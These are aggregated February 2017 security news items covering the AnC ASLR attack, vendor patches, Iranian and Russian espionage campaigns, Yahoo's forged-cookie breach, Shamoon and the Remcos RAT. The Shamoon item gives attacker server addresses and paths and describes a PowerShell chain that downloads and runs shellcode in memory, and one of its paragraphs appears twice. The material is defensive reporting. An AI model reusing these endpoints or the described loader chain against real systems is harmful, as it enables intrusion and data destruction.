The researchers successfully exploited AnC JavaScript attacks via up-to-date Chrome and Firefox web browsers on 22 different CPU micro-architectures in about 90 seconds, even despite ASLR protections built within those browsers, like broken JavaScript timers.
The VUSec research team have published two research papers [1, 2] detailing the AnC attack, along with two video demonstration showing the attack running in a Firefox browser on a 64-bit Linux machine.
In their attack, the researchers combined their AnC JavaScript with attack code that exploits a now-patched use-after-free vulnerability (CVE-2013-0753) in Firefox. Issues with AnC attacks are tracked through several CVE identifiers, including:
CVE-2017-5925 for Intel processors
CVE-2017-5926 for AMD processors
CVE-2017-5927 for ARM processors
CVE-2017-5928 for a timing issue affecting multiple browsers
VUSec team already notified all the affected chipmakers and software firms, including Intel, AMD, Samsung, Nvidia, Microsoft, Apple, Google, and Mozilla, more than three months ago, but only now went public with their findings.
"The conclusion is that such caching behavior and strong address space randomization are mutually exclusive," the paper concludes. "Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical."
"Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as the first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block."
According to the team, the only way you can protect yourself against AnC attacks is to enable plug-ins, such as NoScript for Firefox or ScriptSafe for Chrome, to block untrusted JavaScript code on web pages from running in the browser.
Apple Patches Code Execution Flaw in GarageBand
16.2.2017 securityweek Vulnerebility
An update released this week by Apple for the music creation app GarageBand addresses a high severity vulnerability that can be exploited for arbitrary code execution.
The vulnerability, discovered by researchers at Cisco Talos and reported to Apple in mid-December, is an out-of-bounds write issue caused due to the way saved files are parsed. An attacker can exploit the flaw by getting the targeted user to open a specially crafted GarageBand project file (.band).
“The format is broken into chunks with a specific length field for each,” explained Tyler Bohan, the Cisco Talos researcher who found the bug. “This length is controlled by the user and can be leveraged to expose an exploitable condition.”
Apple first attempted to patch the vulnerability, which it describes as a memory corruption issue, on January 18 with the release of GarageBand 10.1.5 for OS X and macOS.
However, researchers determined that the fix had been incomplete so Apple released GarageBand 10.1.6 on Monday in an effort to properly address the flaw.
The vulnerability also affects Apple’s Logic Pro X audio production suite. Apple claimed to have addressed the flaw in mid-January with the release of version 10.3.
The CVE identifiers assigned to this security hole are CVE-2017-2374 and CVE-2017-2372. Technical details are available in advisories published by Cisco Talos.
This is not the first time Talos researchers have found vulnerabilities in Apple software. In July 2016, they reported discovering several remote code execution vulnerabilities in iOS and OS X that could be exploited using specially crafted image files.
High Severity Flaw Patched in OpenSSL 1.1.0
16.2.2017 securityweek Vulnerebility
A high severity denial-of-service (DoS) vulnerability was patched on Thursday in OpenSSL with the release of version 1.1.0e.
The flaw, tracked as CVE-2017-3733, has been described as an “Encrypt-Then-Mac renegotiation crash.” The security hole, reported by Joe Orton of Red Hat on January 31, does not affect OpenSSL 1.0.2.
“During a renegotiation handshake if the Encrypt-Then-Mac extension is negotiated where it was not in the original handshake (or vice-versa) then this can cause OpenSSL to crash (dependent on ciphersuite). Both clients and servers are affected,” the OpenSSL Project said in its advisory.
The OpenSSL Project has once again reminded users that versions 1.0.1, 1.0.0 and 0.9.8 are not supported and they no longer receive security updates. Version 1.0.2 has a long term support (LTS) date of December 31, 2019, and there are no plans for a 1.0.3 release.
This is the second security update released this year. The first, released in late January, patched four low and moderate severity vulnerabilities.
Kaspersky představil vlastní super bezpečný operační systém
16.2.2017 SecurityWorld OS
Vlastní specializovaný operační systém pro vestavěné systémy s přísnými kyberbezpečnostními požadavky či pro zařízení internetu věcí představila firma Kaspersky Lab. Podle výrobce výrazně snižuje šance výskytu skrytých funkcionalit a minimalizuje riziko kybernetického útoku.
Platforma programům dovolí realizovat pouze doložitelné operace. Aplikace tak budou muset být napsané v „tradičních“ kódech a splňovat přísná bezpečnostní pravidla a obsahovat standardní funkcionality. Pouze to, co bude definované těmito pravidly, bude moci být provedené, včetně funkcionalit samotného operačního systému.
Tento přístup se ukázal být v průběhu vývoje operačního systému velmi časově náročný, ale pro vývojáře aplikací nabízí jasné výhody: bezpečnostní strategie může být navržena souběžně s danou funkcionalitou.
Ta navíc může být ihned otestována – chyba v kódu totiž znamená nezdokumentované chování, které je operačním systémem zablokováno. Především však vývoj bezpečnostní strategie může být přizpůsoben konkrétním obchodním záměrům: bezpečnost může být zpracována na základě požadavků aplikace, a nikoliv opačným způsobem.
Řešení navíc klade důraz na obecně užívané bezpečnostní principy, jako jsou Separation Kernel, Reference Monitor, Multiple Independent Levels of Security nebo architektura Flux Advanced Security Kernel.
Co se týče nasazení, výrobce kromě orientace na tři klíčová odvětví - telekomunikace, automobilový průmysl a těžký průmysl – ještě navíc připravuje speciální balík zaměřený na finanční odvětví (například bezpečnost POS terminálů) a bezpečnostní vylepšení kritických operací pro běžné linuxové systémy koncových uživatelů.
KasperskyOS je dostupný ve třech verzích, každá se specifickými funkcemi -- KasperskyOS, Secure Hypervisor a Security System. Prvně jmenovaný se může použít jako základ, na němž lze postavit síťové routery, IP kamery nebo IoT ovladače.
Secure Hypervisor je schopný vytvořit aplikace s přísnými kontrolními procesy vzájemné komunikace a lze jej využít i pro všeobecné bezpečnostní účely (včetně zabezpečených operací koncových zařízení).
A konečně Security System přináší silné zabezpečení tradičním operačním systémům, vestavěným operačním systémům a operačním systémům reálného času, přičemž je nutné minimální množství dalších vývojářských zásahů.
Novinka, na jejímž vytvoření firma podle svých slov pracovala 15 let, je dostupná pro partnery typu OEM, ODM, systémové integrátory či softwarové vývojáře.
Iranian Spies Target Saudi Arabia in "Magic Hound" Attacks
16.2.2017 securityweek CyberSpy
A cyber espionage operation linked to Iran and the recent Shamoon 2 attacks has targeted several organizations in the Middle East, particularly in Saudi Arabia.
Researchers at Palo Alto Networks have been monitoring the campaign, which dates back to at least mid-2016. Dubbed “Magic Hound,” the operation has been aimed at energy, government and technology sector organizations that are located or have an interest in Saudi Arabia.
The threat actor behind Magic Hound has used a wide range of custom tools and an open-source cross-platform remote access tool (RAT) named Pupy. While Palo Alto Networks has not attributed these attacks to any country, researchers at SecureWorks have also analyzed the campaign and they believe it is related to an actor which they track as COBALT GYPSY. SecureWorks is highly confident that COBALT GYPSY is associated with the Iranian government.
The Magic Hound attacks started with specially crafted macro-enabled Word and Excel documents set up to fetch additional tools using PowerShell. The malicious files appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.
The threat actor has used different types of custom tools to achieve its goals, including droppers, downloaders, executable loaders, document loaders and IRC bots. One of the payloads they delivered was the Python-based Pupy RAT.
It’s worth noting that some of the domains used in this attack and a link to the Pupy RAT were also uncovered by IBM X-Force researchers while trying to determine the initial entry point in the recent Shamoon 2 attacks. The initial breach vector, involving macro-enabled documents and PowerShell, is also similar.
Palo Alto Networks has found connections between the Magic Hound attacks and the Iran-linked threat group known as Rocket Kitten, which has targeted organizations in the Middle East and NATO countries. Furthermore, an IRC bot used in the Magic Hound campaign is very similar to a piece of malware used by Newscaster, aka Charming Kitten and NewsBeef, an Iranian actor known to target individuals in the U.S., Israel and other countries using fake social media personas.
The Charming Kitten and Rocket Kitten groups were also referenced recently in an analysis of MacDownloader, a piece of malware used by Iranian actors to steal data from Mac computers.
Google was aware of Russian APT28 group years before others
16.2.2017 securityweek APT
Lorenzo Bicchierai from MotherBoard shared an interesting private report about Russian cyber espionage operations conducted by APT28, the document was leaked online by Google.
The report dating 2014 includes information collected by Google on the hacking activities conducted by its hackers.
In October 2014, the security experts at FireEye linked cyber attacks against a number of Eastern European countries to a Russian nation-state actor dubbed ATP28.
The report published by FireEye revealed that the APT28 is behind long-running cyber espionage campaigns that targeted also US defense contractors, European security organizations and Eastern European government entities.
FireEye researchers collected evidence that the APT28 group is linked to the Russian Government, the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”
“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.”
The group focused its hacking campaign on targets that would be of interest to Russia, such as the Caucasus region with a focus on Georgia.
It was the beginning of the story, now we used different names to refers the nation state actor, including Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team.
Just a couple of days ago security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian cyberespionage group.
Before the publishing of the report in 2014, several companies were investigating the cyber attacks conducted by the threat actor, including Google of course.
Motherboard “penned a 40-page technical report” on the activities of the APT28 group, a precious document considering that it has never been published before.
“This sort of document, which Motherboard obtained from two independent sources, may be a common sight in the threat intelligence industry, but the public rarely gets to see what such a report from Google looks like.” wrote Lorenzo Bicchierai. “The report draws from one of Google’s most interesting sources of data when it comes to malware and cybersecurity threats: VirusTotal, a public malware repository that the internet giant acquired in 2012.”
The document explicitly refers a couple of malware, the Sofacy and X-Agent, that “are used by a sophisticated state-sponsored group targeting primarily former Soviet republics, NATO members, and other Western European countries.”
This means that Google was informed about the threat years before its public disclosure. Google attributed the attacks to the ATP28 and linked them to the Russian Government much earlier of FireEye, ESET or CrowdStrike.
“It looks like Google researchers were well aware of Sofacy before it was publicly disclosed.”
The title of the document is explicit, “Peering into the Aquarium,” and refers the headquarters of the GRU military intelligence agency, popularly known as “The Aquarium.”
According to the report, the submission share ratio of X-Agent Sofacy in VirusTotaI by country shows that Georgia, Romania, Russia, and Denmark had the highest ratio.
The experts from Google tried to profile the APT28, they noticed that the group used the sophisticated X-Agent only to compromise “high-priority targets.” The nation-state actor made a large use of the Sofacy malware for its wide range campaigns, it has been estimated that Sofacy was three times more common than X-Agent in the wild.
“As a first~stage tool, Sofacy is used relatively indiscriminately against potential targets. X-Agent is reserved for high?priority targets. This is borne out by the data. VirusTotai submissions show that Sofacy was three times more common than X-Agent in the wild, with over 600 distinct samples in the data set.” states the report.
The report includes technical details about APT28 operations, it is interesting to note that the security team at Google was able to identify the threat years before others security firms.
Yahoo Hacked Once Again! Quietly Warns Affected Users About New Attack
16.2.2017 thehackernews Attack
Has Yahoo rebuilt your trust again?
If yes, then you need to think once again, as the company is warning its users of another hack.
Last year, Yahoo admitted two of the largest data breaches on record. One of which that took place in 2013 disclosed personal details associated with more than 1 Billion Yahoo user accounts.
Well, it's happened yet again.
Yahoo sent out another round of notifications to its users on Wednesday, warning that their accounts may have been compromised as recently as last year after an ongoing investigation turned up evidence that hackers used forged cookies to log accounts without passwords.
The company quietly revealed the data breach in security update in December 2016, but the news was largely overlooked, as the statement from Yahoo provided information on a separate data breach that occurred in August 2013 involving more than 1 billion accounts.
The warning message sent Wednesday to some Yahoo users read:
"Based on the ongoing investigation, we believe a forged cookie may have been used in 2015 or 2016 to access your account."
The total number of customers affected by this attack is still unknown, though the company has confirmed that the accounts were affected by a security flaw in Yahoo's mail service.
The flaw allowed "state-sponsored attackers" to use a "forged cookie" created by software stolen from within the company's internal systems to gain access to Yahoo accounts without passwords.
"Forged cookies" are digital keys that allow access to accounts without re-entering passwords.
Here's how the attack works:
Instead of stealing passwords, hackers trick a web browser into telling the company that the victim had already logged in by forging little web browser tokens called cookies.
You use cookies every time you log into any service and check that box that says "keep me logged in," or, "remember me."
So, even if you close the window, or shutdown your system, you will not have to log back into your account because the cookie stored by your browser tells the online service that you already submitted your username and password.
Here's what a Yahoo spokesperson said about the recently disclosed breach:
"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password."
"The investigation has identified user accounts for which we believe forged cookies were taken or used. Yahoo is in the process of notifying all potentially affected account holders."
The warning notification has been sent out to almost all affected Yahoo users, although investigations are still ongoing.
The notice sent to Yahoo's customers on Wednesday, the same day it was reported that Verizon is slashing the price the telecom service will pay for Yahoo by at least $250 Million, following revelations of two security breaches last year, according to a report by Bloomberg.
The price cut appears to indicate the troubled deal will go through.
With yet another disclosed security breach, one might think about closing online accounts associated with Yahoo.
New MacOS Malware linked to Russian Hackers Can Steal Passwords & iPhone Backups
16.2.2017 thehackernews Apple
Security researchers have discovered a new Mac malware allegedly developed by APT28 Russian cyber espionage group who is believed to be responsible for 2016 presidential election hacking scandal.
A new variant of the X-Agent spyware is now targeting Apple macOS system that has previously been used in cyber attacks against Windows, iOS, Android, and Linux devices.
The malware is designed to steal web browser passwords, take screenshots of the display, detect system configurations, execute files and exfiltrate iPhone backups stored on the computer.
The X-Agent malware is tied to Russian hacking group known as APT28 — also known as Fancy Bear, Sofacy, Sednit, and Pawn Storm — that has been operating since at least 2007 and is allegedly linked to the Russian government.
"Our past analysis of samples known to be linked to APT28 group shows a number of similarities between the Sofacy/APT28/Sednit Xagent component for Windows/Linux and the Mac OS binary that currently forms the object of our investigation," Bitdefender reported in a blog post published Tuesday.
"For once, there is the presence of similar modules, such as FileSystem, KeyLogger, and RemoteShell, as well as a similar network module called HttpChanel."
Like variants for other platforms, the Mac version of X-Agent spyware is also act as a backdoor with advanced cyber-espionage capabilities that can be customized depending on the objectives of an attack.
Moreover, X-Agent is being planted by exploiting a vulnerability in the MacKeeper software installed on the targeted computers and known malware dropper Komplex — a first-stage trojan that APT28 uses to infect machines.
Abovementioned evidence indicates that the newly discovered Mac version of X-Agent is also created by the same Russian hacking group.
Once successfully installed, the backdoor checks for the presence of a debugger and if it finds one, it terminates itself to prevent execution. But if not, the backdoor waits for an Internet connection to communicate with the command-and-control servers.
"After the communication has been established, the payload starts the modules. Our preliminary analysis shows most of the C&C URLs impersonate Apple domains," Bitdefender researchers said.
"Once connected to the C&C, the payload sends a HelloMessage, then spawns two communication threads running in infinite loops. The former uses POST requests to send information to the C&C, while the latter monitors GET requests for commands."
The Research is still ongoing and Bitdefender security researchers right now only have the Mac malware sample and not a full picture of how an attack works.
APT28 is one of the two Russian-linked cyber-espionage groups that have been accused of hacking into the U.S. Democratic National Committee's email server last year and interfering with the 2016 presidential election.
You can read BitDefender's previous analysis on the APT28 hacking group here [PDF].
Shamoon Malware Delivered via Weaponized Documents: IBM
16.2.2017 securityweek Virus
The notorious disk-wiping malware Shamoon used macro-enabled documents and PowerShell scripts to infect targeted systems, according to IBM’s X-Force Incident Response and Intelligence Services (IRIS) team.
Shamoon 2 was recently spotted in attacks aimed at Saudi Arabia and other states in the Persian Gulf. The malware, also known as Disttrack, has several variants, including one capable of targeting virtual desktop infrastructure (VDI) products.
An analysis conducted recently by Symantec showed that the attackers behind Shamoon, which many believe are based in Iran, may have been aided by a threat actor dubbed Greenbug. The security firm linked the Greenbug and Shamoon groups after discovering malware from both actors on the same system.
X-Force IRIS researchers have analyzed the recent waves of Shamoon attacks and determined that the initial breach likely took place weeks before the malware was deployed and activated.
It’s worth noting that, in many cases, Shamoon had been programmed to step into action at a specified time and date, typically when the targeted organization’s employees were less likely to notice its actions.
Experts believe the attackers used weaponized Office documents as an entry point. The documents contained a malicious macro which, when executed, initiated command and control (C&C) communications and deployed a remote shell via PowerShell.
The malicious files, which often included resumes and other human resources documents, were sent to targeted users via spear phishing emails. Some of the documents found by IBM referenced an Egypt-based software professional services organization named IT Worx, and Saudi Arabia’s Ministry of Commerce and Investment (MCI).
Once the document is opened and the macro is executed, PowerShell is invoked to provide a communications channel to the compromised device, allowing attackers to remotely execute commands on it.
The threat actor can use this access to deploy other tools and malware, and gain further access into the victim’s network. Once critical servers have been identified, the attackers can deploy Shamoon, which erases hard drives and causes systems to become inoperable.
The macro found in the documents executed two PowerShell scripts, including one served from a domain that had hosted a cross-platform remote access tool named Pupy.
IBM researchers believe the recent analysis and warnings issued by Saudi Arabia will likely cause the Shamoon attackers to once again disappear, like they did after the 2012 Saudi Aramco operation, and change their tactics for the next wave of attacks.
Microsoft Postpones February Security Updates to March 14
16.2.2017 securityweek Vulnerebility
Microsoft has informed customers that the February security updates, which the company delayed due to unspecified issues, will only be released next month as part of the planned Update Tuesday.
The February 2017 security updates should have been released on Tuesday, but the company told users that the patches had to be delayed “due to a last minute issue that could impact some customers.”
Microsoft shared an update on Wednesday, saying that the February patches will be merged with the ones scheduled for release on March 14.
Johannes B. Ullrich, dean of research at the SANS Technology Institute, believes this is “probably overall the least disruptive solution at this point.”
Since Microsoft decided to postpone the release of the security fixes by a full month, it is likely that none of the vulnerabilities they were supposed to address are critical, although many are concerned about an unpatched denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.
It’s still unclear what the last minute issue is, but many believe it could have something to do with cumulative updates. Although, some experts speculated that there may have been a different problem.
“Before the cumulative update model, a single patch could be pulled from the release without impacting the entire Patch Tuesday release. Now, speculation as to if this was an issue with one of the cumulative updates that caused this delay is not entirely unfounded, but thinking about this, if it were one update that was broken Microsoft could release everything else,” said Chris Goettl, product manager with Ivanti. “The fact is Microsoft didn¹t release anything, which sounds more like an infrastructure issue.”
In addition to the SMB-related vulnerability, the next security updates could patch a medium-severity information disclosure flaw discovered by Google Project Zero researchers. The weakness, tracked as CVE-2017-0038, was reported to Microsoft on November 16 and its details were disclosed on Wednesday after the 90 day deadline.
Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide.
IBM shares details on the attack chain for the Shamoon malware
16.2.2017 securityaffairs Virus
Security experts at IBM published a report that includes precious details on the attack chain of the dreader Shamoon cyberweapon.
The dreaded Shamoon malware, aka Disttrack, has resurrected and government agencies and threat intelligence firms are investigating the recent strings of attacks leveraging the dangerous disk wiper.
We detected the Shamoon malware for the first time in August 15th, 2012, when the Saudi Arabia’s oil company, Saudi Aramco announced that its systems and its internal network were victims of a cyber-attack. According to the company, Shamoon infected more than 30,000 workstations.
On December 2016, security experts observed a new wave of attacks leveraging on the Shamoon malware. The malware experts from Palo Alto Networks and Symantec both reported an attack on a single Saudi company.
The new variant of Shamoon, so-called Shamoon 2, can rewrite the MBR on affected computers with an image of a three-year-old Syrian boy named Alan Kurdi that lay dead on a Turkish beach.
“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.
In January, researchers at Palo Alto Networks discovered a new strain of the Shamoon 2 malware that was targeting virtualization products.
The researchers at IBM’s X-Force Incident Response and Intelligence Services (IRIS) believe Shamoon malware is pivot element in the information warfare between Saudi Arabia and Iran.
The malware experts have identified servers used to deliver Shamoon, they have broken onto the server used by the attackers and gathered more information to study the threat and its attack chain.
“This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:” IBM reports.
Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
Attackers can now communicate with the compromised machine and remotely execute commands on it.
The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
Attackers study the network by connecting to additional systems and locating critical servers.
The attackers deploy the Shamoon malware.
A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.
The attackers launched a spear-phishing campaign against the potential targets, they used to impersonate a trusted person, for example, the Saudi Arabia’s Ministry of Commerce and Investment or the Egyptian software company IT Worx.
The messages come with a Word document marked as a resume, health insurance paperwork, or password policy guidelines, anyway something of interest for the potential victim.
The documents include a malicious macro that starts the attack. When the victim executes the macro it launches two Powershell scripts.
The first script downloads and executes another PowerShell script from the 139.59.46.154:3485/eiloShaegae1 via HTTP. The second script creates a memory buffer using the VirtualAlloc library call, fetches shell code from 45.76.128.165:4443/0w0O6 via HTTP, copies it into the buffer, and executes the code using CreateThread. This thread then creates another buffer, fills it with a PowerShell script from 45.76.128.165:4443/0w0O6 via HTTP, and runs that.
The second script creates a memory buffer using the VirtualAlloc library call, fetches shell code from 45.76.128.165:4443/0w0O6 via HTTP, copies it into the buffer, and executes the code using CreateThread. This thread then creates another buffer, fills it with a PowerShell script from 45.76.128.165:4443/0w0O6 via HTTP, and runs that, too.
“Based on observations associated with the malicious document, we observed subsequent shell sessions probably associated with Metasploit’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys,” continues the report.
The researchers identified two web domains used to host malicious executables and launch the attacks.
Ntg-sa[.]com that spoofs the legit ntg.sa.com domain of Saudi petrochemical support firm Namer Trading Group.
maps-modon[.]club that spoofs maps.modon.gov.sa, which is associated with the Saudi Industrial Property Authority,
This information is precious for system administrators that could check any connection to these domains and block it.
The experts discovered that attackers once infected the machine use them for reconnaissance, gathering information on the network and stealing sensitive information. Once completed this phase the attackers deploy the Shamoon payload.
Saudi Arabia is warning local organizations about the Shamoon malware, experts believe that the threat actor behind these operations will continue its activity temporarily disappearing and changing tactic.
Cyber Warriors See Politics Muddying Security Efforts
16.2.2017 securityweek Cyber
San Francisco - President Donald Trump has vowed to improve cyber attack defense, but security experts meeting this week say a fractious domestic and international political landscape could hamstring efforts to improve internet security.
As the White House mulls an executive order on cybersecurity to combat an epidemic of data breaches and hacks, participants at the annual RSA Conference voiced concern that dwindling political unity will challenge efforts to improve defense.
"The core of the problem hasn't changed; defenders have to win every time whereas attackers only have to win once," Forrester Research vice president and group director Laura Koetzle told AFP, while discussing the current state of online threats.
"What is different now is that the geopolitical situation is more unstable than it has been in quite a while."
Anti-globalization rhetoric that has been inflamed by Trump's rise and the United Kingdom's Brexit have shaken faith in the "globally interconnected world order" -- seen as upholding rules and agreements to peacefully resolve online and real-world differences between nations.
If alliances for thwarting online assaults weaken, Koetzle said, "greater testing from Russia, North Korea, China" and others can be expected, as countries test how far limits can be pushed.
The issue of cyber defense was brought to the forefront after US intelligence officials concluded Russia had carried out a series of attacks aimed at disrupting the election, possibly helping Trump's campaign.
And an unprecedented series of breaches that have compromised data on millions of US government employees, internet giants such as Yahoo and large companies like Sony Pictures present additional challenges to the administration.
'Digital Geneva Convention'
Microsoft chief legal officer Brad Smith used the RSA stage to call for a "Digital Geneva Convention" that would set lines that should not be crossed in cyber war, with an independent oversight body to identify offenders.
"Just as the Fourth Geneva Convention has long protected civilians in times of war, we now need a Digital Geneva Convention that will commit governments to protecting civilians from nation-state attacks in times of peace," Smith said during a keynote presentation.
While addressing RSA attendees, Representative Michael McCaul, a Texas Republican who heads the House Committee on Homeland Security, was among those warning of looming cyber threats.
"There is no doubt in my mind that the Russian government tried to undermine our elections," McCaul said.
"Cyber intrusion has the potential to change the very fabric of our democracy."
Sameer Bhalotra, co-chair of a task force formed to advise Trump at the Center for Strategic and International Studies, said the country needs an agency that investigates cyber attacks.
He said the administration's stance on reducing regulation could speed the adoption of national computer security standards, because there would be less worry about being tethered by rules.
Technology and trust
Cyber policy task force co-chair Karen Evans had advised the administration to consider data as belonging to the user -- an approach that could bolster arguments against weakening encryption or building in back doors to access people's data.
The task force also strongly advocated bulking cyber defenses and ramping up the cost of attacks to discouraging levels, while urging the government to rely on the private sector.
Trump had been expected to release an executive order focused on cyber security early this week, but it was unclear Wednesday when it might land.
Recommendations from the task force included a few radical ideas, such as befriending hackers and promoting "bug bounties" to reward those who discover system vulnerabilities, said Nico Sell, co-founder of encrypted messaging service Wickr.
"If the administration expects an improvement in how we deal with cyber incidents, they will have to figure out how to foster trust -- especially in this charged environment," Koetzle said. "The poisoning of politics fosters a tendency of not collaborating with institutions, and that is when things break down; especially in cyber security."
Yahoo Notifies Users of Sophisticated Breach Methods
16.2.2017 securityweek Safety
Yahoo said Wednesday it was notifying some users that hackers may have been able to use a maneuver to break into their accounts without stealing passwords.
The latest notifications were in response to the record breach disclosed late last year affecting an estimated one billion users -- which involved forging of "cookies" or files used to authenticate users when they log into their accounts.
The notification indicates the investigation into the attacks are in the final stage, according to a source familiar with the matter, noting that messages had been sent to "a reasonably final list" of Yahoo users.
A Yahoo spokesman said the company was notifying all potentially affected users and that it had "invalidated" the forged cookies.
"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password," the company said in a statement.
"The investigation has identified user accounts for which we believe forged cookies were taken or used."
Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.
The data breaches have been a major embarrassment for a former internet leader that is in the process of selling its core operations to telecom giant Verizon for $4.8 billion.
Some reports Wednesday said the two companies had agreed to discount the price by $250 million to $300 million following disclosure of the attacks.
Neither Yahoo nor Verizon commented on the reports.
Yahoo is selling its main operating business as a way to separate that from its more valuable stake in Chinese internet giant Alibaba.
The share-tending entity, to be renamed Altaba, Inc., will act as an investment company.
Obrana prakticky neexistuje. Viry samy smažou všechny stopy
15.2.2017 Novinky/Bezpečnost Viry
V loňském roce se doslova roztrhl pytel s vyděračskými viry. Ty dokázaly napáchat na napadeném stroji velkou neplechu, ale uživatel alespoň hned věděl, na čem je. Nezvaní návštěvníci se totiž téměř okamžitě přihlásili o výkupné. Nová vlna útoků v letošním roce je však daleko vážnější, protože si škodlivé kódy hrají s uživateli na schovávanou.
Útoky vyděračských virů mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.
Ani po zaplacení výkupného se uživatelé ke svým datům nemusejí dostat. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A v některých případech to dokonce nejde vůbec.
V každém případě platí, že si uživatel aktivity počítačového viru všimne prakticky hned poté, co se uhnízdí v počítači. Pokud má tedy zálohu dat, stačí přeinstalovat operační systém a už není nijak ohrožen.
Snaží se zůstat v utajení
Bezpečností experti antivirové společnosti Kaspersky Lab však nyní upozornili na to, že se množí tzv. neviditelné cílené útoky. Jak je z jejich označení již patrné, počítačoví piráti se při nich snaží zůstat co nejdéle v utajení.
„Neviditelné útoky využívají pouze legální software, jako jsou široce dostupné penetrační testy a správcovské nástroje nebo PowerShell aplikační rámce pro automatizaci úloh v systému Windows. Nezanechávají přitom žádné malwarové soubory na pevném disku, nýbrž je ukrývají v operační paměti,“ podotkli bezpečnostní experti.
To velmi znesnadňuje případné odhalení škodlivých kódů v napadeném stroji. Běžně je totiž možné dohledat aktivitu hackerů na pevných discích klidně ještě rok po útoku. V případě, že jsou data ukryta v operační paměti, automaticky se smažou po prvním restartování počítače.
„Útočníci se v systému zdržují jen na nezbytně dlouhou dobu, během níž shromažďují informace ještě před tím, než se jejich stopy v systému vymažou prvním restartováním,“ doplnili odborníci.
Útočí především na firmy
Zmiňovanou taktiku používají kyberzločinci především při útocích na firmy. Není nicméně vyloučeno, že stejný postup nebudou v dohledné době aplikovat také při útocích na koncové uživatele.
Antivirová společnost Kaspersky Lab doposud odhalila podobné útoky na více než čtyřech desítkách společností v Evropě, USA, Jižní Americe a dalších koutech světa. Počítačoví piráti se při nich soustředí především na banky, telekomunikační společnosti a v neposlední řadě i na vládní organizace. Zda se podobný útok uskutečnil v Česku, není v tuto chvíli jasné.
Easy-to-Use Remcos RAT Spotted in Live Attacks
15.2.2017 Securityweek Virus
After receiving numerous improvements, a Remote Administration Tool (RAT) that emerged last year on hacking forums was recently observed in live attacks, Fortinet security researchers reveal.
Dubbed Remcos, the RAT was put up for sale during the second half of 2016 and is currently available starting at $58 and going up to $389, depending on the selected license period and number of "masters" or clients. Available as version 1.7.3 at the moment, the malware is distributed via malicious Office documents named Quotation.xls or Quotation.doc, supposedly delivered via email.
The malicious documents include obfuscated macros designed to call shell commands to bypass User Account Control (UAC) and execute the malware with elevated privileges, researchers say. Abusing Event Viewer (eventvwr.exe) for privilege escalation, the UAC-bypass technique has been adopted by various threats recently, including ransomware.
The Remcos RAT includes only UPX and MPRESS1 packers to compress and obfuscate its server component, but the analyzed sample revealed an extra custom packer on top of MPRESS1, but no other obfuscation beyond this. The server component was built from the latest Remcos v1.7.3 Pro variant, which was released on Jan. 23, 2017, the developer’s website shows.
The code also revealed the commands that the server can carry out, all of which are also included in the free, stripped down client version available through the developer’s website. The Remcos Client features five main tabs, each with specific functions, namely Connections, Automatic Tasks, Local Settings, Builder, and Event Log.
Through the Connections tab, one can monitor all active connections and can view basic information on the installed server component and the infected system for each of them, Fortinet explains. What’s more, this tab allows the sending of commands to the infected system, allowing an actor to take screenshots of the targeted machine, search for files, view running processes, execute commands, log keystrokes, steal passwords, access the webcam and microphone, download and execute code, and more.
While most of the commands are common to RATs, the Automatic Tasks tab in Remcos is a feature new to applications in this category. Through it, the server component can be configured to automatically execute functions without any manual action from the client once a connection has been established. Through this feature, an actor can easily create an infiltrate-exfiltrate-exit scheme that doesn’t require manual triggers, something usually seen in spyware or malware downloaders, the security researchers say.
The Local Settings tab provides access to settings for the client side, allowing an attacker to set which ports on the client machine the server should connect to, as well as the passwords that should be used. The same password is required on both the listening port and the connecting server, because Remcos uses the password for both authentication and as a key for encrypting network traffic using a simple RC4 algorithm.
The Builder tab allows criminals wannabe to customize the parameters of the server binary. This tab features a series of sub-sections, including Connection (to set client IP addresses and ports for the server to connect to upon installation), Installation (to set installation path, autorun registries, and a watchdog module, along with a UAC bypass), Stealth (set system tray icon behavior and basic anti-analysis/anti-sandbox routines), Keylogger (set basic keylogger functions and an option to remove browser cookies and stored passwords), Surveillance (set the option to take screenshots periodically or when specific windows are active), and Build (to pack the server binary using UPX and MPRESS).
“It is possible that the attacker only used the document macro as a template to download and execute the binary, and never intended to use the script’s UAC bypass since the server binary itself already has the same function. In fact, it uses the same UAC bypass technique, but this time with an added routine to revert the modified registry after gaining privilege. This is logical, because not restoring the registry can produce system errors that can cause suspicion from the user every time an .msc file needs to be opened,” the researchers say.
The Event Log tab was meant to display connection logs with the server, as well as information regarding the client’s status (updates, ports, etc.). There is also an About tab, which contains acknowledgements and some promotions on other products by an author named Viotto.
